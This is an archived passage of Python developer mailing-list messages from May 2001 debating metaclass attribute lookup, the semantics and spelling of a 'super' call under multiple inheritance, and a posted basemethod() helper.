the misleading error message would only show up in case DictType does not define a __repr__ method. Then the inherited one from TypeType would come into play and cause the problem you mention above. Thinking in terms of meta-classes, I believe we should implement this mechanism in the meta-class (TypeType in this case). Its __getattr__() will have to decide whether or not to expose its own methods and attributes or not. The only catch here is that currently instances and classes have control of whether and how to bind found functions as methods or not. We should probably change that to pass complete control over to the meta-class object and remove the special control flows currently found in instance_getattr2() and class_lookup(). In general, I think that meta-classes should not expose their attributes to the class objects they create, since this causes way to many problems. Perhaps I'm oversimplifying things here, but I have a feeling that we can go a long way by actually trying to see meta-classes as first class members in the interpreter design and moving all the binding and lookup mechanisms over to this object type. The special casing should then take place in the meta-class rather than its creations. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 2 11:57:42 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 12:57:42 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> > > The most common use for these seems to be for calling > > inherited methods, so perhaps something like > > > > inherited MyBaseClass.foo(arg, ...) > > > > which would be equivalent to > > > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > > > where getmethod() is a new builtin like getattr() > > except that it looks in the __classdict__, and 'self' > > is really whatever the first argument of the containing > > method was. > > The second most common use is to reference class variables > (e.g. imagine a class that keeps counters of how many instances have > been created and deleted in C.initcount and C.delcount). But these > should not have to change, since they really are class attributes. > > > Now that we have __future__, would such a change be contemplatable? > > Or is it too radical to even think about? > > If we can find a way to spell "super.method", we should be ready for > the future. I can't think of something right off the bat > unfortunately. Could we make super(self, MyBaseClass).foo(arg, ...) behave similar to MyBaseClass.foo(self, arg, ...) Wrapping this stuff in a function would probably also enable to use the same pattern in existing python versions. Thomas From thomas.heller@ion-tof.com Wed May 2 12:12:21 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 13:12:21 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> > Jim Althoff (a big commercial user of J[P]ython) sent me a summary of > how metaclasses work in Smalltalk. He should know, since he invented > them! :-) I include it below, with his permission. I found this very interesting reading. [From Jim Althoff] > In the list below, indentation indicates class hieararchy (superclass -- > subclass) The indentation, unfortunately, seems to be destroyed. > > plain-class > ---------------- > > o Class > o Object isInstanceOf > o ObjectMetaClass isInstanceOf MetaClass > o Class isInstanceOf > o ClassMetaClass isInstanceOf MetaClass > o MetaClass isInstanceOf > o MetaClassMetaClass isInstanceOf MetaClass > . . . > o Rectangle isInstanceOf > o RectangleMetaClass isInstanceOf MetaClass > o SpecializedRectangle isInstanceOf > o SpecializedRectangleMetaClass isInstanceOf MetaClass A question for Jim (this is more Smalltalk than Python related): How does the Behaviour class fit into this picture? Thhomas From guido@digicool.com Wed May 2 13:15:57 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 07:15:57 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200." <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com> > > If we can find a way to spell "super.method", we should be ready for > > the future. I can't think of something right off the bat > > unfortunately. > > Could we make > > super(self, MyBaseClass).foo(arg, ...) > > behave similar to > > MyBaseClass.foo(self, arg, ...) > > Wrapping this stuff in a function would probably also > enable to use the same pattern in existing python versions. Yes, I can see how to write super() using current tools (or 1.5.2 even). The problem is that this makes super calls even more wordy than they already are! I can't think of anything that wouldn't require compiler support though. --Guido van Rossum (home page: http://www.python.org/~guido/) From gward@python.net Wed May 2 13:57:41 2001 From: gward@python.net (Greg Ward) Date: Wed, 2 May 2001 08:57:41 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500 References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> Message-ID: <20010502085741.B515@gerg.ca> On 02 May 2001, Guido van Rossum said: > Yes, I can see how to write super() using current tools (or 1.5.2 > even). The problem is that this makes super calls even more wordy > than they already are! I can't think of anything that wouldn't > require compiler support though. I was just doing some gedanken with various ways to spell "super", and I think my favourite is the same as Java's (as I remember it): class MyClass (BaseClass): def foo (self, arg1, arg2): super.foo(arg1, arg2) Since I don't know much about Python's guts, I can't say how implementable this is, but I like the spelling. The semantics would be something like this (with adjustments to the reality of Python's guts): * 'super' is a magic object that only makes sense inside a 'def' inside a 'class' (at least for now; perhaps it could be generalized to work at class scope as well as method scope, but let's keep it simple) * super's notional __getattr__() does something like this: - peek at the calling stack frame and fetch the calling function (MyClass.foo) and the first argument to that function (self) - [is this possible?] ensure that calling_function is a bound method, and that it's bound to the self object we just plucked from the stack; raise a "misuse of super object" exception if not - walk the superclass tree starting at self.__class__.__bases__ (ie. skip self's class), looking for an object with the name passed to this __getattr__() call -- 'foo' - when found, return it - if not found, raise AttributeError The ability to peek at the calling stack frame is essential to this scheme, in order to fetch the "current object" (self) without needing to have it explicitly passed. Is this as bothersome from C as it is from Python? Greg -- Greg Ward - nerd gward@python.net http://starship.python.net/~gward/ In space, no one can hear you fart. From mal@lemburg.com Wed May 2 14:07:27 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 15:07:27 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <3AF0068F.32388C87@lemburg.com> Greg Ward wrote: > > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > ... This doesn't work in Python since Python has multiple inheritence, e.g. super in class A(B,C): def foo(self): super.foo() is ambiguous. I'd rather suggest adding a function for finding the basemethod of a method. This is probably the most common task in this context. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 2 14:12:40 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 15:12:40 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook> [Greg Ward] > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) > > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not > - walk the superclass tree starting at self.__class__.__bases__ Caareful! The search in the above context must start at MyClass.__bases__ which may not be the same as self.__class__.__bases__. Thomas From guido@digicool.com Wed May 2 15:29:03 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:29:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400." <20010502085741.B515@gerg.ca> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> [Greg Ward, welcome back!] > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) I'm sure that's everybody's favorite way to spell it! It's mine too. :-) > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) Yes, that's about the only way it can be made to work. The compiler will have to (1) detect that 'super' is a free variable, and (2) make it a local and initialize it with the proper magic. Or, to relieve the burden from the symbol table, we could make super a keyword, at the cost of breaking existing code. I don't think super is needed outside methods. > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not I don't think you can make that test, but making it a 'magic local' as I suggested above would avoid the problem. > - walk the superclass tree starting at self.__class__.__bases__ > (ie. skip self's class), looking for an object with the name > passed to this __getattr__() call -- 'foo' > - when found, return it > - if not found, raise AttributeError Yup, that's the easy part. :-) > The ability to peek at the calling stack frame is essential to this > scheme, in order to fetch the "current object" (self) without needing to > have it explicitly passed. Is this as bothersome from C as it is from > Python? No, in C it's easy. The problem is that there is no information in the frame that tells you where the currently executing function was defined -- all you have is the code object, which is context-independent. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 2 15:30:20 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:30:20 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200." <3AF0068F.32388C87@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com> > This doesn't work in Python since Python has multiple inheritence, > e.g. super in > > class A(B,C): > def foo(self): > super.foo() > > is ambiguous. I'm not sure what you mean. The search is totally well-defined: first search B for a foo method, then search C. > I'd rather suggest adding a function for finding the basemethod > of a method. This is probably the most common task in this context. I've never heard of the concept of basemethod, but if I may venture a guess, it would be the same definition as I give above. --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy@digicool.com Wed May 2 14:38:42 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Wed, 2 May 2001 09:38:42 -0400 (EDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <15088.3554.953359.757584@slothrop.digicool.com> >>>>> "GvR" == Guido van Rossum writes: >> Since I don't know much about Python's guts, I can't say how >> implementable this is, but I like the spelling. The semantics >> would be something like this (with adjustments to the reality of >> Python's guts): >> >> * 'super' is a magic object that only makes sense inside a 'def' >> inside a 'class' (at least for now; perhaps it could be >> generalized to work at class scope as well as method scope, but >> let's keep it simple) GvR> Yes, that's about the only way it can be made to work. The GvR> compiler will have to (1) detect that 'super' is a free GvR> variable, and (2) make it a local and initialize it with the GvR> proper magic. Or, to relieve the burden from the symbol table, GvR> we could make super a keyword, at the cost of breaking existing GvR> code. GvR> I don't think super is needed outside methods. It seems helpful to clarify here, since this came up in conversation at PythonLabs just the other day with the yield statement. If we try to avoid keywords, we have to take the "well, I don't see anyone assigning to this name" route. If the compiler does not detect any assignment to a nearly reserved word, like super, it would give the use of that word special meaning. There are a bunch of little problems. A module could (not necessarily should) be designed to have a global name poked into its namespace; this would break, because the name would already have transmogrified from a regular variable into a special one. The use of exec or import star would make it impossible for the word to take on its special meaning. So keywords really are a lot clearer, but they have the potential to be incompatible. Jeremy From fredrik@pythonware.com Wed May 2 15:00:55 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Wed, 2 May 2001 16:00:55 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff> guido wrote: > > class MyClass (BaseClass): > > def foo (self, arg1, arg2): > > super.foo(arg1, arg2) > > I'm sure that's everybody's favorite way to spell it! not mine. my brain contains far too much Python 1.5.2 code for it to accept that some variables are dynamically scoped, while others are lexically scoped. why not spell it out: self.__super__.foo(arg1, arg2) or self.super.foo(arg1, arg2) or super(self).foo(arg1, arg2) > Or, to relieve the burden from the symbol table, we could make super > a keyword, at the cost of breaking existing code. hey, how about introducing $ as a keyword prefix for newly introduced keywords? $super.foo(arg1, arg2) (this can of course be mapped to either of my previous suggestions; "$foo" either means "self.foo" or "foo(self)"...) and to save a little typing, only use it for keywords that start with an "s" (should leave us plenty of expansion room): $uper.foo(arg1, arg2) otoh, if "super" is common enough to motivate introducing magic objects into python, maybe "$" should mean "super."? $foo(arg1, arg2) and while we're at it, let's introduce "@" for "self.". gotta run -- time for my monthly reboot /F From guido@digicool.com Wed May 2 16:03:37 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:03:37 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200." <3AEFCEBD.2E5979C9@lemburg.com> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com> [me] > > The best rule I can think of so far is that DictType.__dict__ gives > > the *true* set of attribute descriptors for dictionary objects, and is > > thus similar to Smalltalks's class.methodDict that Jim describes > > below. DictType.foo is a shortcut that can resolve to either > > DictType.__dict__['foo'] or to an attribute (maybe a method) of > > DictType described in TypeType.__dict__['foo'], whichever is defined. > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. [MAL] > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that both a dictionary object (call it d) and its type (DictType) have a __repr__ method: repr(d) returns "d", and repr(DictType) returns "". Given the analogy with classes, where str(x) invokes x.__str__() and x.__str__() can also be called directly, it is not unreasonable to expect that this works in general, so that repr(d) can be spelled as d.__repr__() and repr(DictType) as DictType.__repr__() And, given another analogy with classes, where x.foo() is equivalent to x.__class__.foo(x), the two forms above should also be equivalent to d.__class__.__repr__(d) and DictType.__class__.__repr__(DictType) But since d.__class__ is DictType, we now have two conflicting ways to derive a meaning for DictType.__repr__: the first one going repr(DictType) => DictType.__repr__() and the second one going repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d) The rule quoted above chooses the second meaning, from the very pragmatic point that once I allow subclassing from DictType, such a subclass might very well want to override __repr__ to wrap the base class __repr__, and the conventional way to reference that (barring the implementation of 'super') is DictType.__repr__. Direct invocation of an object's own __repr__ method as x.__repr__() is much les common. The implementation of repr(x) can do the right thing, which is to look for x.__class__.__dict__['__repr__']. > The problem with the misleading error message would only show > up in case DictType does not define a __repr__ method. Then the > inherited one from TypeType would come into play and cause > the problem you mention above. No, the issue is not inheritance: I haven't implemented inheritance yet. DictType is an instance of TypeType but doesn't inherit from it. > Thinking in terms of meta-classes, I believe we should implement > this mechanism in the meta-class (TypeType in this case). Its > __getattr__() will have to decide whether or not to expose its > own methods and attributes or not. That's exactly how I solved it: type_getattro() implements the rule quoted at the top. > The only catch here is that currently instances and classes have > control of whether and how to bind found functions as methods or not. > We should probably change that to pass complete control over to the > meta-class object and remove the special control flows currently found > in instance_getattr2() and class_lookup(). Um, yeah, that's where I think this will end up causing more trouble. Right now, if x is an instance, some attributes like x.__class__ and x.__dict__ special-cased in instance_getattr(). The mechanism I propose removes the need for (most of) such special cases, and instead allows the class to provide "descriptors" for instance attributes. So, for example, if instances of a class C have an attribute named foo, C.__dict__['foo'] contains the descriptor for that attribute, and that is how the implementation decides how to interpret x.foo (assuming x is an instance of C). We may be able to access this same descriptor as C.foo, but that's really only important for backwards compatibility with the way classes work today. > In general, I think that meta-classes should not expose their > attributes to the class objects they create, since this causes > way to many problems. I agree. > Perhaps I'm oversimplifying things here, but I have a feeling that > we can go a long way by actually trying to see meta-classes as > first class members in the interpreter design and moving all the > binding and lookup mechanisms over to this object type. The special > casing should then take place in the meta-class rather than its > creations. Yes, that's where I'm heading! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 15:02:41 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:02:41 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF01381.592AE31B@lemburg.com> Guido van Rossum wrote: > > > This doesn't work in Python since Python has multiple inheritence, > > e.g. super in > > > > class A(B,C): > > def foo(self): > > super.foo() > > > > is ambiguous. > > I'm not sure what you mean. The search is totally well-defined: first > search B for a foo method, then search C. I thought you were talking about an abstract super class which is how Java uses this term. Rereading some of the posts, I think you are indeed referring to the method which foo overrides -- this is what I call basemethod (since it is implemented in one of the base classes). > > I'd rather suggest adding a function for finding the basemethod > > of a method. This is probably the most common task in this context. > > I've never heard of the concept of basemethod, but if I may venture a > guess, it would be the same definition as I give above. The basemethod can be defined as the first method of the same name found in the inheritence tree using the standard Python lookup strategy (left-right, depth first) when continuing the lookup search at the node in the inheritence tree which defines the method querying the basemethod. In other words: you let Python continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API. Hmm, still not clear enough... better let Tim jump in here (we've had a discussion about basemethod() some months or years ago). Tim ? Note that there are many ways of defining what a basemethod is, due to the ambiguities that are caused by multiple inheritence (e.g. the same base class may appear in different branches of the inheritence tree). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 16:05:30 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:05:30 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200." <000d01c0d310$4ee127d0$0900a8c0@spiff> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com> > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) > > > Or, to relieve the burden from the symbol table, we could make super > > a keyword, at the cost of breaking existing code. > > hey, how about introducing $ as a keyword prefix for newly introduced > keywords? > > $super.foo(arg1, arg2) > > (this can of course be mapped to either of my previous suggestions; > "$foo" either means "self.foo" or "foo(self)"...) > > and to save a little typing, only use it for keywords that start with > an "s" (should leave us plenty of expansion room): > > $uper.foo(arg1, arg2) > > otoh, if "super" is common enough to motivate introducing magic objects > into python, maybe "$" should mean "super."? > > $foo(arg1, arg2) > > and while we're at it, let's introduce "@" for "self.". > > gotta run -- time for my monthly reboot /F LOL! But you forgot the spelling of self.__super.foo(arg1, arg2) which would pass in the class name that's the other necessary input to a proper implementation of super. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 15:04:29 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:04:29 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF013ED.8A190FE2@lemburg.com> Here's an implementation of what I currently use to track down the basemethod (taken from mx.Tools): import types _basemethod_cache = {} def basemethod(object,method=None, cache=_basemethod_cache,InstanceType=types.InstanceType, ClassType=types.ClassType,None=None): """ Return the unbound method that is defined *after* method in the inheritance order of object with the same name as method (usually called base method or overridden method). object can be an instance, class or bound method. method, if given, may be a bound or unbound method. If it is not given, object must be bound method. Note: Unbound methods must be called with an instance as first argument. The function uses a cache to speed up processing. Changes done to the class structure after the first hit will not be noticed by the function. XXX Rewrite in C to increase performance. """ if method is None: method = object object = method.im_self defclass = method.im_class name = method.__name__ if type(object) is InstanceType: objclass = object.__class__ elif type(object) is ClassType: objclass = object else: objclass = object.im_class # Check cache cacheentry = (defclass, name) basemethod = cache.get(cacheentry, None) if basemethod is not None: if not issubclass(objclass, basemethod.im_class): if __debug__: sys.stderr.write( 'basemethod(%s, %s): cached version (%s) mismatch: ' '%s !-> %s\n' % (object, method, basemethod, objclass, basemethod.im_class)) else: return basemethod # Find defining class path = [objclass] while 1: if not path: raise AttributeError,method c = path[0] del path[0] if c.__bases__: # Prepend bases of the class path[0:0] = list(c.__bases__) if c is defclass: # Found (first occurance of) defining class in inheritance # graph break # Scan rest of path for the next occurance of a method with the # same name while 1: if not path: raise AttributeError,name c = path[0] basemethod = getattr(c, name, None) if basemethod is not None: # Found; store in cache and return cache[cacheentry] = basemethod return basemethod del path[0] raise AttributeError,'method %s' % name -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 2 15:06:39 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:06:39 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> /F: > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) IMO we still need to specify the class, and there we are: super(self, MyClass).foo(arg1, arg2) Thomas From guido@digicool.com Wed May 2 16:11:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:11:17 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200." <3AF01381.592AE31B@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > > > > This doesn't work in Python since Python has multiple inheritence, > > > e.g. super in > > > > > > class A(B,C): > > > def foo(self): > > > super.foo() > > > > > > is ambiguous. > > > > I'm not sure what you mean. The search is totally well-defined: first > > search B for a foo method, then search C. > > I thought you were talking about an abstract super class which is > how Java uses this term. Ah. I didn't realize. This would suggest that another (not yet mentioned) suggestion would be to spell the basemethod call as super.foo(self) keeping more in line with the tradition of passing self explicitly when calling basemethods. > Rereading some of the posts, I think you are indeed referring to > the method which foo overrides -- this is what I call basemethod > (since it is implemented in one of the base classes). Aha. > > > I'd rather suggest adding a function for finding the basemethod > > > of a method. This is probably the most common task in this context. > > > > I've never heard of the concept of basemethod, but if I may venture a > > guess, it would be the same definition as I give above. > > The basemethod can be defined as the first method of the same name > found in the inheritence tree using the standard Python lookup > strategy (left-right, depth first) when continuing the lookup search > at the node in the inheritence tree which defines the method querying > the basemethod. Yes, that's what I guessed. > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the basemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? > > Note that there are many ways of defining what a basemethod > is, due to the ambiguities that are caused by multiple inheritence > (e.g. the same base class may appear in different branches of the > inheritence tree). Well, the search will find one definite method, but you're right that there may be situations where it's necessary to specify the specific base class! In C++ that is solved by writing B::foo() or C::foo(). Python doesn't have "::" and instead overloads the "." operator. Hmm, so even introducing super doesn't completely remove the need to be able to write C.foo to reference the unbound method foo of class C, and this may require that my ugly rule still be needed. AFAIK, Smalltalk has only single inheritance, and so does Java, so there 'super' is enough. Will we need to add a "::" operator to Python??? --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 2 16:19:07 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:19:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200." <3AF013ED.8A190FE2@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com> > Here's an implementation of what I currently use to track down > the basemethod (taken from mx.Tools): How am I supposed to use this? I tried this: class B: def foo(self): print "B.foo" class C(B): def foo(self): print "C.foo" B.foo(self) print basemethod(self.foo) # Expect this to be B.foo class D(C): def foo(self): print "D.foo" C.foo(self) d = D() d.foo() but the call to basemethod(self.foo) in C prints C.foo, not B.foo as required. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 2 16:23:33 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:23:33 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: 